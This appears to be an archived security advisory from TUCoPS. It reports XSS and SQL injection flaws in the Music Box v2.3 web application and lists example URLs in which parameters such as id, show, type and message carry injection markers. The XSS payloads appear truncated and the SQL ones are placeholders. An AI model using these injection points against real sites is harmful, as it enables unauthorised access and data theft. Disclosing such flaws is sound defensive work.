TUCoPS :: Web :: Apps :: b06-1253.htm

XSS & SQL Injection in Music Box v2.3
XSS & SQL Injection in Music Box v2.3
XSS & SQL Injection in Music Box v2.3


Hello
Vulnerable: Music Box v2.3
http://www.MusicboxV2.com 

Exploit :
XSS :
http://example.com/music/index.php?id='> 

http://example.com/music/index.php?action=top&show=5&type='> 

http://example.com/music/index.php?action=top&show='>&type=Artists 

http://example.com/music/cart/cart.php?message1='> 

http://example.com/music/cart/cart.php?message='> 

SQL :
http://example.com/music/index.php?action=top&show=5&type=[SQL] 

http://example.com/music/index.php?action=top&show=[SQL]&type=Artists 


Discovery by Linux_Drox

http://www.lezr.com 

Best Regards ,,

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH